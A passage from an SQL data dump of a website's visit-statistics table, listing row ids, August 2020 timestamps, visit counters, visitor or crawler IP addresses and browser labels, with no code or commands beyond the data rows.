2,2,0,0,'66.249.70.70','chrome'),(529272,1596728448,1,1,0,0,'157.55.39.244','other'),(529273,1596728648,10,10,0,0,'34.200.218.187','other'),(529274,1596728694,2,2,0,0,'66.249.70.69','chrome'),(529275,1596728752,1,1,0,0,'66.249.64.38','chrome'),(529276,1596729298,2,2,0,0,'207.46.13.200','other'),(529277,1596729580,8,8,0,0,'34.200.218.187','other'),(529278,1596730507,7,7,0,0,'34.200.218.187','other'),(529279,1596730610,1,1,0,0,'95.133.160.174','chrome'),(529280,1596730656,2,2,0,0,'91.196.178.113','chrome'),(529281,1596730962,1,1,0,0,'3.101.43.66','chrome'),(529282,1596730969,11,11,0,0,'18.144.133.188','chrome'),(529283,1596730971,1,1,0,0,'54.151.28.193','chrome'),(529284,1596731073,2,2,0,0,'66.249.70.72','chrome'),(529285,1596731494,12,12,0,0,'34.200.218.187','other'),(529286,1596732521,2,1,1,0,'66.249.70.70',''),(529287,1596732588,7,7,0,0,'34.200.218.187','other'),(529288,1596732944,1,1,0,0,'66.249.64.36','chrome'),(529289,1596733051,1,1,0,0,'91.196.178.65','firefox'),(529290,1596733062,1,1,0,0,'66.249.70.70','chrome'),(529291,1596733684,1,1,0,0,'66.249.70.72','chrome'),(529292,1596733705,4,4,0,0,'34.200.218.187','other'),(529293,1596733942,1,1,0,0,'66.249.70.69','chrome'),(529294,1596734152,1,1,0,0,'66.249.70.70','chrome'),(529295,1596734445,1,1,0,0,'213.87.146.61','chrome'),(529296,1596735289,1,1,0,0,'8.29.198.25','other'),(529297,1596736236,2,2,0,0,'66.249.70.70','chrome'),(529298,1596737486,1,1,0,0,'157.55.39.244','other'),(529299,1596738159,1,1,0,0,'66.249.70.72','chrome'),(529300,1596738406,1,1,0,0,'5.45.207.174','other'),(529301,1596738741,1,1,0,0,'66.249.70.70','chrome'),(529302,1596739259,1,1,0,0,'207.46.13.85','other'),(529303,1596739914,1,1,0,0,'17.58.99.7','other'),(529304,1596740016,1,1,0,0,'66.249.70.72','chrome'),(529305,1596741053,1,1,0,0,'66.249.70.72','chrome'),(529306,1596741104,4,4,0,0,'66.249.70.69','chrome'),(529307,1596741136,8,8,0,0,'193.194.115.242','other'),(529308,1596741849,1,1,0,0,'178.154.200.51','other'),(529309,1596742543,1,1,0,0,'157.55.39.244','other'),(529310,1596742572,1,1,0,0,'207.46.13.85','other'),(529311,1596743336,2,2,0,0,'88.155.81.149','chrome'),(529312,1596743454,1,1,0,0,'157.55.39.161','other'),(529313,1596743698,2,2,0,0,'66.249.70.70','chrome'),(529314,1596743765,1,1,0,0,'66.249.70.69','chrome'),(529315,1596744056,1,1,0,0,'66.249.64.36','chrome'),(529316,1596744642,1,1,0,0,'176.192.191.79','firefox'),(529317,1596744661,1,1,0,0,'74.125.46.207','chrome'),(529318,1596745661,1,1,0,0,'66.249.64.36','chrome'),(529319,1596745794,1,1,0,0,'66.249.70.69','chrome'),(529320,1596746118,1,1,0,0,'8.29.198.27','other'),(529321,1596746815,8,8,0,0,'193.194.115.242','other'),(529322,1596747045,1,1,0,0,'66.249.70.70','chrome'),(529323,1596747380,1,1,0,0,'5.45.207.92','other'),(529324,1596747922,1,1,0,0,'66.249.70.72','chrome'),(529325,1596748095,1,1,0,0,'66.249.70.69','chrome'),(529326,1596748321,1,1,0,0,'17.58.99.84','other'),(529327,1596749421,1,1,0,0,'66.249.70.70','chrome'),(529328,1596751034,1,1,0,0,'66.249.70.70','chrome'),(529329,1596751076,1,1,0,0,'66.249.70.69','chrome'),(529330,1596752248,1,1,0,0,'66.249.70.69','chrome'),(529331,1596752589,1,1,0,0,'157.55.39.244','other'),(529332,1596752729,1,1,0,0,'5.45.207.174','other'),(529333,1596753853,1,1,0,0,'66.249.70.69','chrome'),(529334,1596754107,1,1,0,0,'5.255.253.183','other'),(529335,1596754121,1,1,0,0,'207.46.13.85','other'),(529336,1596755277,1,1,0,0,'17.58.99.84','other'),(529337,1596756944,1,1,0,0,'8.29.198.25','other'),(529338,1596758108,1,1,0,0,'62.205.134.182','other'),(529339,1596758128,1,1,0,0,'66.249.70.70','chrome'),(529340,1596758686,1,1,0,0,'66.249.70.69','chrome'),(529341,1596758760,1,1,0,0,'66.249.70.72','chrome'),(529342,1596759247,1,1,0,0,'178.154.200.112','other'),(529343,1596760042,2,2,0,0,'66.249.70.70','chrome'),(529344,1596760928,1,1,0,0,'17.58.99.84','other'),(529345,1596761306,1,1,0,0,'66.249.70.70','chrome'),(529346,1596763107,2,2,0,0,'66.249.70.69','chrome'),(529347,1596763958,1,1,0,0,'66.249.70.70','chrome'),(529348,1596764199,1,1,0,0,'66.249.70.69','chrome'),(529349,1596764956,2,2,0,0,'66.249.70.72','chrome'),(529350,1596765660,1,1,0,0,'207.46.13.200','other'),(529351,1596766462,1,1,0,0,'66.249.70.72','chrome'),(529352,1596767535,2,2,0,0,'66.249.70.70','chrome'),(529353,1596767710,1,1,0,0,'66.249.64.36','chrome'),(529354,1596767777,1,1,0,0,'8.29.198.25','other'),(529355,1596769489,1,1,0,0,'66.249.70.69','chrome'),(529356,1596769839,1,1,0,0,'66.249.64.36','chrome'),(529357,1596769892,1,1,0,0,'66.249.70.70','chrome'),(529358,1596770398,33,33,0,0,'5.45.207.174','other'),(529359,1596770485,13,13,0,0,'178.154.200.51','other'),(529360,1596770493,4,4,0,0,'5.45.207.92','other'),(529361,1596770527,4,4,0,0,'5.255.253.136','other'),(529362,1596770583,1,1,0,0,'178.154.200.92','other'),(529363,1596770585,1,1,0,0,'5.45.207.135','other'),(529364,1596770745,1,1,0,0,'178.154.200.112','other'),(529365,1596771303,1,1,0,0,'66.249.70.70','chrome'),(529366,1596772311,1,1,0,0,'157.55.39.186','other'),(529367,1596772336,2,2,0,0,'157.55.39.88','other'),(529368,1596772683,2,2,0,0,'66.249.70.69','chrome'),(529369,1596772938,1,1,0,0,'66.249.70.72','chrome'),(529370,1596773391,2,2,0,0,'207.46.13.200','other'),(529371,1596773557,1,1,0,0,'66.249.64.33','chrome'),(529372,1596774017,1,1,0,0,'178.154.200.19','other'),(529373,1596774351,1,1,0,0,'131.220.6.152','chrome'),(529374,1596774539,1,1,0,0,'66.249.70.72','chrome'),(529375,1596775530,8,8,0,0,'193.194.115.242','other'),(529376,1596776110,1,1,0,0,'66.249.70.69','chrome'),(529377,1596776171,1,1,0,0,'62.205.134.182','other'),(529378,1596776243,2,2,0,0,'66.249.70.70','chrome'),(529379,1596776640,8,8,0,0,'94.130.9.183','other'),(529380,1596777449,1,1,0,0,'66.249.64.36','chrome'),(529381,1596777606,7,7,0,0,'94.130.9.183','other'),(529382,1596777772,1,1,0,0,'157.55.39.88','other'),(529383,1596778012,1,1,0,0,'5.255.253.136','other'),(529384,1596778116,1,1,0,0,'91.196.178.72','chrome'),(529385,1596778399,1,1,0,0,'178.92.73.37','chrome'),(529386,1596778472,1,1,0,0,'66.249.70.70','chrome'),(529387,1596778511,2,2,0,0,'94.130.9.183','other'),(529388,1596778606,1,1,0,0,'8.29.198.26','other'),(529389,1596778907,1,1,0,0,'46.211.31.80','chrome'),(529390,1596779977,1,1,0,0,'66.249.70.69','chrome'),(529391,1596780360,1,1,0,0,'66.249.70.70','chrome'),(529392,1596781415,1,1,0,0,'91.196.178.72','chrome'),(529393,1596781824,1,1,0,0,'66.249.70.72','chrome'),(529394,1596782252,8,8,0,0,'193.194.115.242','other'),(529395,1596783627,1,1,0,0,'66.249.70.70','chrome'),(529396,1596783645,1,1,0,0,'91.196.178.72','chrome'),(529397,1596784289,1,1,0,0,'193.194.115.242','other'),(529398,1596784535,1,0,1,0,'66.249.70.69',''),(529399,1596784545,1,0,1,0,'66.249.70.70',''),(529400,1596784554,1,1,0,0,'66.249.70.69','chrome'),(529401,1596785087,1,1,0,0,'157.55.39.186','other'),(529402,1596785201,2,2,0,0,'178.95.245.101','chrome'),(529403,1596786193,1,1,0,0,'66.249.70.69','chrome'),(529404,1596786516,2,2,0,0,'178.95.245.101','chrome'),(529405,1596787106,1,1,0,0,'66.249.70.70','chrome'),(529406,1596787173,1,1,0,0,'66.249.70.72','chrome'),(529407,1596787323,1,1,0,0,'66.249.70.69','chrome'),(529408,1596787414,8,8,0,0,'193.194.115.242','other'),(529409,1596788462,1,1,0,0,'66.249.70.72','chrome'),(529410,1596788495,2,2,0,0,'66.249.70.70','chrome'),(529411,1596788855,1,1,0,0,'193.194.115.242','other'),(529412,1596788933,1,1,0,0,'46.219.77.44','chrome'),(529413,1596789168,1,1,0,0,'185.200.246.102','other'),(529414,1596789435,1,1,0,0,'8.29.198.26','other'),(529415,1596789702,3,3,0,0,'35.232.36.240','chrome'),(529416,1596789704,1,1,0,0,'35.232.36.240','other'),(529417,1596790273,1,1,0,0,'91.196.178.154','chrome'),(529418,1596790517,1,1,0,0,'212.26.139.194','chrome'),(529419,1596790838,8,8,0,0,'193.194.115.242','other'),(529420,1596791726,1,1,0,0,'141.101.22.73','chrome'),(529421,1596791788,1,1,0,0,'66.249.70.70','chrome'),(529422,1596791790,1,1,0,0,'66.249.70.69','chrome'),(529423,1596791998,2,2,0,0,'66.249.70.72','chrome'),(529424,1596793877,1,1,0,0,'66.249.64.33','chrome'),(529425,1596794616,2,2,0,0,'91.196.178.171','chrome'),(529426,1596794633,1,1,0,0,'66.249.70.72','chrome'),(529427,1596795149,1,1,0,0,'3.135.62.236','chrome'),(529428,1596795240,1,1,0,0,'66.249.64.36','chrome'),(529429,1596795390,1,1,0,0,'77.111.244.49','chrome'),(529430,1596796007,1,1,0,0,'66.249.70.70','chrome'),(529431,1596796100,1,1,0,0,'109.232.227.149','firefox'),(529432,1596796699,1,1,0,0,'157.55.39.88','other'),(529433,1596796704,1,1,0,0,'66.249.64.36','chrome'),(529434,1596796882,1,1,0,0,'17.58.99.7','other'),(529435,1596797205,1,1,0,0,'157.55.39.186','other'),(529436,1596797719,1,1,0,0,'66.249.70.70','chrome'),(529437,1596798709,2,2,0,0,'66.249.70.70','chrome'),(529438,1596799088,1,1,0,0,'109.74.154.72','chrome'),(529439,1596799992,1,1,0,0,'207.46.13.85','other'),(529440,1596800110,1,1,0,0,'66.249.70.72','chrome'),(529441,1596800264,1,1,0,0,'8.29.198.25','other'),(529442,1596800340,1,1,0,0,'66.249.70.69','chrome'),(529443,1596800560,8,8,0,0,'193.194.115.242','other'),(529444,1596800581,2,2,0,0,'66.249.70.70','chrome'),(529445,1596801110,1,1,0,0,'173.252.87.113','other'),(529446,1596801139,1,1,0,0,'66.249.70.72','chrome'),(529447,1596802402,1,1,0,0,'66.249.70.72','chrome'),(529448,1596802421,8,8,0,0,'193.194.115.242','other'),(529449,1596804670,1,1,0,0,'31.28.172.16','chrome'),(529450,1596804952,8,8,0,0,'193.194.115.242','other'),(529451,1596805233,4,4,0,0,'66.249.70.69','chrome'),(529452,1596806040,2,2,0,0,'46.219.6.40','chrome'),(529453,1596807417,2,2,0,0,'66.249.70.69','chrome'),(529454,1596807659,8,8,0,0,'193.194.115.242','other'),(529455,1596808394,1,1,0,0,'91.196.178.146','chrome'),(529456,1596808600,1,1,0,0,'46.211.44.98','chrome'),(529457,1596808713,1,1,0,0,'178.154.200.40','other'),(529458,1596808924,1,0,1,0,'66.249.70.70',''),(529459,1596809205,1,1,0,0,'66.249.70.72','chrome'),(529460,1596809481,2,2,0,0,'66.249.70.70','chrome'),(529461,1596811090,1,1,0,0,'8.29.198.27','other'),(529462,1596811401,1,1,0,0,'66.249.64.38','chrome'),(529463,1596811547,1,1,0,0,'5.255.253.69','other'),(529464,1596812033,1,1,0,0,'66.249.64.36','chrome'),(529465,1596812151,1,1,0,0,'178.154.200.112','other'),(529466,1596812406,8,8,0,0,'193.194.115.242','other'),(529467,1596812457,2,2,0,0,'66.249.70.70','chrome'),(529468,1596812590,1,1,0,0,'66.249.70.69','chrome'),(529469,1596813114,1,1,0,0,'66.249.64.33','chrome'),(529470,1596813659,1,1,0,0,'207.46.13.85','other'),(529471,1596814087,1,1,0,0,'66.249.64.38','chrome'),(529472,1596814104,1,1,0,0,'66.249.70.69','chrome'),(529473,1596814483,1,1,0,0,'5.45.207.174','other'),(529474,1596814802,1,1,0,0,'66.249.70.72','chrome'),(529475,1596815860,1,1,0,0,'207.46.13.200','other'),(529476,1596815984,1,1,0,0,'66.249.64.38','chrome'),(529477,1596817131,1,1,0,0,'66.249.64.38','chrome'),(529478,1596817610,1,1,0,0,'157.55.39.244','other'),(529479,1596818069,2,2,0,0,'34.211.25.132','other'),(529480,1596818109,1,1,0,0,'138.246.253.15','chrome'),(529481,1596818198,1,1,0,0,'5.45.207.92','other'),(529482,1596820490,1,1,0,0,'5.45.207.174','other'),(529483,1596820806,1,1,0,0,'5.255.253.136','other'),(529484,1596821020,1,1,0,0,'5.45.207.92','other'),(529485,1596821566,1,1,0,0,'5.255.253.115','other'),(529486,1596821652,1,1,0,0,'5.45.207.174','other'),(529487,1596821655,8,8,0,0,'193.194.115.242','other'),(529488,1596821659,4,4,0,0,'178.154.200.51','other'),(529489,1596821922,1,1,0,0,'8.29.198.26','other'),(529490,1596822845,1,1,0,0,'193.194.115.242','other'),(529491,1596823154,1,0,1,0,'66.249.70.72',''),(529492,1596823283,1,1,0,0,'91.196.178.182','chrome'),(529493,1596823350,1,1,0,0,'157.55.39.88','other'),(529494,1596824381,1,1,0,0,'66.249.70.70','chrome'),(529495,1596824436,1,1,0,0,'66.249.70.69','chrome'),(529496,1596824472,1,1,0,0,'157.55.39.186','other'),(529497,1596824869,4,4,0,0,'66.249.64.38','chrome'),(529498,1596825065,2,2,0,0,'66.249.70.72','chrome'),(529499,1596825388,1,1,0,0,'17.58.99.7','other'),(529500,1596825446,2,2,0,0,'66.249.70.70','chrome'),(529501,1596825910,2,2,0,0,'66.249.70.69','chrome'),(529502,1596826724,1,1,0,0,'66.249.64.36','chrome'),(529503,1596826812,3,3,0,0,'5.45.207.174','other'),(529504,1596826833,1,1,0,0,'157.55.39.244','other'),(529505,1596826955,1,1,0,0,'207.46.13.200','other'),(529506,1596827014,2,2,0,0,'66.249.70.72','chrome'),(529507,1596827065,2,2,0,0,'66.249.70.69','chrome'),(529508,1596827192,8,8,0,0,'193.194.115.242','other'),(529509,1596827604,1,1,0,0,'88.155.59.52','chrome'),(529510,1596828191,2,2,0,0,'66.249.70.69','chrome'),(529511,1596828630,1,1,0,0,'66.249.70.72','chrome'),(529512,1596828820,3,3,0,0,'35.239.189.191','chrome'),(529513,1596828822,1,1,0,0,'35.239.189.191','other'),(529514,1596829009,3,3,0,0,'66.249.70.70','chrome'),(529515,1596829162,1,1,0,0,'5.45.207.174','other'),(529516,1596829919,3,3,0,0,'66.249.70.70','chrome'),(529517,1596829936,1,1,0,0,'66.249.64.38','chrome'),(529518,1596829971,1,1,0,0,'66.249.70.69','chrome'),(529519,1596830143,1,1,0,0,'5.45.207.174','other'),(529520,1596830170,1,1,0,0,'91.196.178.1','chrome'),(529521,1596830322,1,1,0,0,'66.249.70.72','chrome'),(529522,1596830801,1,1,0,0,'66.249.64.36','chrome'),(529523,1596831074,2,2,0,0,'66.249.70.69','chrome'),(529524,1596831607,8,8,0,0,'193.194.115.242','other'),(529525,1596831635,1,1,0,0,'66.249.64.38','chrome'),(529526,1596831698,3,2,1,0,'66.249.70.70',''),(529527,1596832060,1,1,0,0,'5.45.207.174','other'),(529528,1596832523,1,1,0,0,'5.255.253.88','other'),(529529,1596832678,2,2,0,0,'66.249.70.72','chrome'),(529530,1596832716,1,1,0,0,'66.249.70.69','chrome'),(529531,1596832760,1,1,0,0,'8.29.198.26','other'),(529532,1596833290,1,1,0,0,'66.249.70.70','chrome'),(529533,1596834033,1,1,0,0,'66.249.70.69','chrome'),(529534,1596834174,1,1,0,0,'207.46.13.85','other'),(529535,1596835312,2,1,1,0,'66.249.70.72',''),(529536,1596835357,1,1,0,0,'66.249.64.33','chrome'),(529537,1596835733,1,1,0,0,'66.249.70.70','chrome'),(529538,1596835860,1,1,0,0,'5.45.207.174','other'),(529539,1596837107,1,1,0,0,'66.249.70.69','chrome'),(529540,1596837136,2,2,0,0,'72.13.46.6','other'),(529541,1596837415,1,1,0,0,'66.249.64.38','chrome'),(529542,1596837447,1,1,0,0,'66.249.70.70','chrome'),(529543,1596837731,1,1,0,0,'157.55.39.186','other'),(529544,1596837871,1,1,0,0,'178.154.200.51','other'),(529545,1596838714,1,1,0,0,'66.249.70.70','chrome'),(529546,1596839042,2,2,0,0,'66.249.70.72','chrome'),(529547,1596839409,1,1,0,0,'178.154.200.112','other'),(529548,1596839426,1,1,0,0,'66.249.70.69','chrome'),(529549,1596839456,1,1,0,0,'178.154.200.19','other'),(529550,1596839915,1,1,0,0,'157.55.39.168','other'),(529551,1596839980,8,8,0,0,'193.194.115.242','other'),(529552,1596840080,1,1,0,0,'66.249.64.33','chrome'),(529553,1596840359,1,1,0,0,'5.45.207.174','other'),(529554,1596840389,1,1,0,0,'207.46.13.85','other'),(529555,1596840424,1,1,0,0,'66.249.70.70','chrome'),(529556,1596841585,4,4,0,0,'66.249.70.70','chrome'),(529557,1596842145,5,5,0,0,'66.249.70.69','chrome'),(529558,1596842248,1,1,0,0,'66.249.64.36','chrome'),(529559,1596842292,1,1,0,0,'66.249.64.38','chrome'),(529560,1596842409,4,4,0,0,'66.249.70.72','chrome'),(529561,1596842570,3,3,0,0,'66.249.70.70','chrome'),(529562,1596842777,1,1,0,0,'207.46.13.153','other'),(529563,1596842865,1,1,0,0,'178.154.200.51','other'),(529564,1596843074,2,2,0,0,'66.249.70.69','chrome'),(529565,1596843404,14,14,0,0,'3.236.214.137','firefox'),(529566,1596843583,1,1,0,0,'8.29.198.27','other'),(529567,1596844508,1,1,0,0,'62.205.134.182','other'),(529568,1596845280,2,2,0,0,'66.249.70.72','chrome'),(529569,1596845316,1,1,0,0,'66.249.70.69','chrome'),(529570,1596845695,1,1,0,0,'5.45.207.174','other'),(529571,1596845951,1,1,0,0,'199.127.56.236','chrome'),(529572,1596846288,3,3,0,0,'66.249.70.69','chrome'),(529573,1596846428,3,3,0,0,'66.249.70.70','chrome'),(529574,1596846691,1,1,0,0,'5.255.253.136','other'),(529575,1596846905,2,2,0,0,'5.255.253.183','other'),(529576,1596846992,1,1,0,0,'66.249.64.36','chrome'),(529577,1596847042,3,3,0,0,'5.45.207.174','other'),(529578,1596847334,1,1,0,0,'66.249.70.72','chrome'),(529579,1596847809,2,2,0,0,'66.249.70.70','chrome'),(529580,1596848129,1,1,0,0,'157.55.39.244','other'),(529581,1596848397,2,2,0,0,'5.45.207.174','other'),(529582,1596848450,1,1,0,0,'5.255.253.183','other'),(529583,1596848634,1,1,0,0,'207.46.13.85','other'),(529584,1596848770,1,1,0,0,'66.249.64.38','chrome'),(529585,1596848784,3,3,0,0,'66.249.70.72','chrome'),(529586,1596849169,2,2,0,0,'66.249.70.70','chrome'),(529587,1596849472,1,1,0,0,'66.249.64.33','chrome'),(529588,1596849687,1,1,0,0,'66.249.70.72','chrome'),(529589,1596849705,1,1,0,0,'66.249.64.38','chrome'),(529590,1596850152,7,7,0,0,'193.194.115.242','other'),(529591,1596850411,1,1,0,0,'66.249.64.36','chrome'),(529592,1596850607,3,3,0,0,'66.249.70.70','chrome'),(529593,1596850869,2,2,0,0,'207.46.13.185','other'),(529594,1596851127,4,4,0,0,'66.249.70.69','chrome'),(529595,1596851316,1,1,0,0,'178.154.200.115','other'),(529596,1596851341,2,2,0,0,'66.249.64.33','chrome'),(529597,1596851504,3,3,0,0,'66.249.70.72','chrome'),(529598,1596851889,6,6,0,0,'66.249.70.70','chrome'),(529599,1596852332,1,1,0,0,'5.255.253.183','other'),(529600,1596852334,5,5,0,0,'66.249.70.69','chrome'),(529601,1596852601,2,2,0,0,'66.249.70.72','chrome'),(529602,1596852903,8,8,0,0,'193.194.115.242','other'),(529603,1596852929,1,1,0,0,'39.101.129.127','other'),(529604,1596853323,1,1,0,0,'207.46.13.185','other'),(529605,1596853484,1,1,0,0,'178.154.200.105','other'),(529606,1596853718,1,1,0,0,'157.55.39.244','other'),(529607,1596853776,1,1,0,0,'66.249.64.38','chrome'),(529608,1596853874,1,1,0,0,'66.249.70.72','chrome'),(529609,1596854044,2,2,0,0,'66.249.70.70','chrome'),(529610,1596854091,1,1,0,0,'5.255.253.88','other'),(529611,1596854188,3,3,0,0,'34.71.47.56','chrome'),(529612,1596854189,1,1,0,0,'34.71.47.56','other'),(529613,1596854221,6,6,0,0,'66.249.70.69','chrome'),(529614,1596854262,1,1,0,0,'178.154.200.51','other'),(529615,1596854417,1,1,0,0,'8.29.198.26','other'),(529616,1596854586,2,2,0,0,'66.249.64.33','chrome'),(529617,1596854809,5,5,0,0,'66.249.70.72','chrome'),(529618,1596854997,1,1,0,0,'5.255.253.136','other'),(529619,1596855740,1,1,0,0,'5.255.253.105','other'),(529620,1596855862,2,2,0,0,'207.46.13.153','other'),(529621,1596855919,1,1,0,0,'5.45.207.135','other'),(529622,1596856007,1,1,0,0,'66.249.70.69','chrome'),(529623,1596856038,8,8,0,0,'193.194.115.242','other'),(529624,1596856812,3,3,0,0,'66.249.70.70','chrome'),(529625,1596856994,1,1,0,0,'17.58.99.84','other'),(529626,1596857021,2,2,0,0,'66.249.70.69','chrome'),(529627,1596857670,1,1,0,0,'157.55.39.152','other'),(529628,1596858095,2,2,0,0,'66.249.70.69','chrome'),(529629,1596858270,1,1,0,0,'66.249.70.72','chrome'),(529630,1596858294,2,2,0,0,'5.45.207.174','other'),(529631,1596858904,3,3,0,0,'66.249.70.70','chrome'),(529632,1596859321,1,1,0,0,'66.249.70.72','chrome'),(529633,1596859444,2,2,0,0,'66.249.70.69','chrome'),(529634,1596859452,8,8,0,0,'193.194.115.242','other'),(529635,1596859948,1,1,0,0,'17.58.99.84','other'),(529636,1596859994,1,1,0,0,'207.46.13.185','other'),(529637,1596860357,2,2,0,0,'207.46.13.78','other'),(529638,1596860494,1,1,0,0,'2.47.39.218','other'),(529639,1596860512,1,1,0,0,'5.45.207.174','other'),(529640,1596860691,3,3,0,0,'66.249.70.69','chrome'),(529641,1596860844,1,1,0,0,'66.249.64.33','chrome'),(529642,1596860889,1,1,0,0,'157.55.39.244','other'),(529643,1596860925,2,2,0,0,'66.249.70.70','chrome'),(529644,1596860945,1,1,0,0,'66.249.70.72','chrome'),(529645,1596861797,1,1,0,0,'17.58.99.84','other'),(529646,1596861849,2,2,0,0,'66.249.70.70','chrome'),(529647,1596861961,1,1,0,0,'66.249.70.72','chrome'),(529648,1596862012,1,1,0,0,'66.249.64.33','chrome'),(529649,1596862068,1,0,1,0,'66.249.70.69',''),(529650,1596862113,3,3,0,0,'66.249.70.69','chrome'),(529651,1596862383,1,1,0,0,'131.220.6.152','chrome'),(529652,1596862466,1,1,0,0,'157.55.39.152','other'),(529653,1596862741,1,1,0,0,'62.205.134.182','other'),(529654,1596862754,1,1,0,0,'66.249.70.70','chrome'),(529655,1596863126,1,1,0,0,'207.46.13.141','other'),(529656,1596863861,4,4,0,0,'66.249.70.72','chrome'),(529657,1596864053,1,1,0,0,'5.255.253.183','other'),(529658,1596864058,2,2,0,0,'5.45.207.174','other'),(529659,1596864073,1,1,0,0,'5.255.253.105','other'),(529660,1596864141,3,3,0,0,'66.249.70.69','chrome'),(529661,1596864807,1,1,0,0,'178.154.200.51','other'),(529662,1596864975,6,6,0,0,'66.249.70.70','chrome'),(529663,1596865168,2,2,0,0,'66.249.70.69','chrome'),(529664,1596865248,1,1,0,0,'8.29.198.27','other'),(529665,1596865385,2,2,0,0,'66.249.64.33','chrome'),(529666,1596866550,3,3,0,0,'66.249.70.69','chrome'),(529667,1596866646,2,2,0,0,'66.249.70.70','chrome'),(529668,1596867801,2,2,0,0,'66.249.70.72','chrome'),(529669,1596868302,1,1,0,0,'66.249.64.38','chrome'),(529670,1596868573,1,1,0,0,'66.249.70.70','chrome'),(529671,1596869041,2,2,0,0,'66.249.70.72','chrome'),(529672,1596869302,1,1,0,0,'207.46.13.242','other'),(529673,1596869463,2,2,0,0,'66.249.64.36','chrome'),(529674,1596869538,1,1,0,0,'66.249.70.70','chrome'),(529675,1596870148,1,1,0,0,'46.42.176.93','chrome'),(529676,1596870514,4,4,0,0,'66.249.70.70','chrome'),(529677,1596870526,1,1,0,0,'5.45.207.174','other'),(529678,1596870684,3,3,0,0,'66.249.70.72','chrome'),(529679,1596870736,3,3,0,0,'66.249.64.33','chrome'),(529680,1596870744,1,1,0,0,'66.249.64.36','chrome'),(529681,1596871386,1,1,0,0,'157.55.39.244','other'),(529682,1596871541,2,2,0,0,'66.249.70.69','chrome'),(529683,1596871738,1,1,0,0,'66.249.64.33','chrome'),(529684,1596871755,1,1,0,0,'66.249.70.72','chrome'),(529685,1596872582,4,4,0,0,'66.249.70.69','chrome'),(529686,1596872839,4,4,0,0,'66.249.70.70','chrome'),(529687,1596873237,1,1,0,0,'91.209.11.236','other'),(529688,1596873317,3,3,0,0,'66.249.70.72','chrome'),(529689,1596873443,1,1,0,0,'178.154.200.51','other'),(529690,1596873684,2,2,0,0,'66.249.70.69','chrome'),(529691,1596873844,1,1,0,0,'17.58.99.7','other'),(529692,1596873867,3,3,0,0,'66.249.70.70','chrome'),(529693,1596874229,3,3,0,0,'66.249.70.72','chrome'),(529694,1596874515,2,2,0,0,'66.249.64.36','chrome'),(529695,1596874640,1,1,0,0,'66.249.64.38','chrome'),(529696,1596874662,1,1,0,0,'66.249.64.33','chrome'),(529697,1596874965,7,7,0,0,'66.249.70.69','chrome'),(529698,1596875281,2,2,0,0,'66.249.70.72','chrome'),(529699,1596875645,1,1,0,0,'66.249.64.33','chrome'),(529700,1596875883,2,2,0,0,'66.249.70.69','chrome'),(529701,1596876074,1,1,0,0,'8.29.198.27','other'),(529702,1596876381,1,1,0,0,'66.249.70.72','chrome'),(529703,1596876555,1,1,0,0,'154.51.131.142','chrome'),(529704,1596877605,3,3,0,0,'66.249.70.69','chrome'),(529705,1596877697,1,1,0,0,'66.249.70.70','chrome'),(529706,1596878604,3,3,0,0,'66.249.70.69','chrome'),(529707,1596878700,1,1,0,0,'66.249.70.70','chrome'),(529708,1596878765,3,3,0,0,'66.249.70.72','chrome'),(529709,1596879019,1,1,0,0,'66.249.64.36','chrome'),(529710,1596879095,1,1,0,0,'66.249.64.38','chrome'),(529711,1596879482,2,2,0,0,'5.45.207.174','other'),(529712,1596880015,1,1,0,0,'157.55.39.244','other'),(529713,1596880305,3,3,0,0,'66.249.70.69','chrome'),(529714,1596880679,1,1,0,0,'66.249.64.38','chrome'),(529715,1596880775,1,1,0,0,'66.249.64.36','chrome'),(529716,1596880962,1,1,0,0,'66.249.70.70','chrome'),(529717,1596881059,3,3,0,0,'66.249.70.72','chrome'),(529718,1596881288,1,1,0,0,'207.46.13.242','other'),(529719,1596881552,3,3,0,0,'66.249.70.69','chrome'),(529720,1596882038,1,1,0,0,'66.249.64.36','chrome'),(529721,1596882230,2,2,0,0,'178.154.200.51','other'),(529722,1596882302,3,3,0,0,'66.249.70.70','chrome'),(529723,1596882533,1,1,0,0,'17.58.99.7','other'),(529724,1596882604,3,3,0,0,'66.249.70.72','chrome'),(529725,1596882770,1,1,0,0,'207.46.13.242','other'),(529726,1596882814,4,4,0,0,'66.249.70.69','chrome'),(529727,1596882884,1,1,0,0,'5.45.207.92','other'),(529728,1596882924,3,3,0,0,'66.249.64.38','chrome'),(529729,1596883358,4,4,0,0,'5.45.207.174','chrome'),(529730,1596883387,4,4,0,0,'5.255.253.136','chrome'),(529731,1596883388,2,2,0,0,'178.154.200.112','chrome'),(529732,1596883399,1,1,0,0,'5.45.207.92','chrome'),(529733,1596883803,4,4,0,0,'66.249.70.69','chrome'),(529734,1596884303,1,1,0,0,'66.249.64.38','chrome'),(529735,1596884324,1,1,0,0,'5.45.207.174','other'),(529736,1596884326,4,4,0,0,'66.249.70.70','chrome'),(529737,1596884746,1,1,0,0,'109.74.154.72','chrome'),(529738,1596884851,1,1,0,0,'207.46.13.242','other'),(529739,1596885434,1,1,0,0,'66.249.70.69','chrome'),(529740,1596885845,1,1,0,0,'66.249.70.72','chrome'),(529741,1596886288,1,1,0,0,'66.249.64.38','chrome'),(529742,1596886310,4,4,0,0,'66.249.64.36','chrome'),(529743,1596886340,1,1,0,0,'66.249.70.70','chrome'),(529744,1596886517,2,2,0,0,'66.249.70.69','chrome'),(529745,1596886903,1,1,0,0,'8.29.198.26','other'),(529746,1596887127,1,1,0,0,'66.249.70.72','chrome'),(529747,1596887994,1,1,0,0,'5.45.207.92','other'),(529748,1596888029,2,2,0,0,'66.249.70.69','chrome'),(529749,1596888146,1,1,0,0,'66.249.64.36','chrome'),(529750,1596888304,1,1,0,0,'207.46.13.59','other'),(529751,1596888555,1,1,0,0,'66.249.70.70','chrome'),(529752,1596888892,2,2,0,0,'66.249.70.72','chrome'),(529753,1596889470,1,1,0,0,'5.45.207.92','other'),(529754,1596889831,2,2,0,0,'17.58.99.7','other'),(529755,1596890071,3,3,0,0,'66.249.70.72','chrome'),(529756,1596890165,3,3,0,0,'66.249.70.69','chrome'),(529757,1596890180,1,1,0,0,'66.249.70.70','chrome'),(529758,1596891149,1,1,0,0,'66.249.64.36','chrome'),(529759,1596891153,2,2,0,0,'66.249.70.69','chrome'),(529760,1596891537,1,1,0,0,'66.249.64.33','chrome'),(529761,1596891869,1,1,0,0,'66.249.70.72','chrome'),(529762,1596892177,1,1,0,0,'185.143.147.196','chrome'),(529763,1596892319,3,3,0,0,'66.249.70.70','chrome'),(529764,1596892471,1,1,0,0,'17.58.99.7','other'),(529765,1596892670,4,4,0,0,'66.249.70.69','chrome'),(529766,1596892712,1,1,0,0,'66.249.64.38','chrome'),(529767,1596892802,2,2,0,0,'66.249.70.72','chrome'),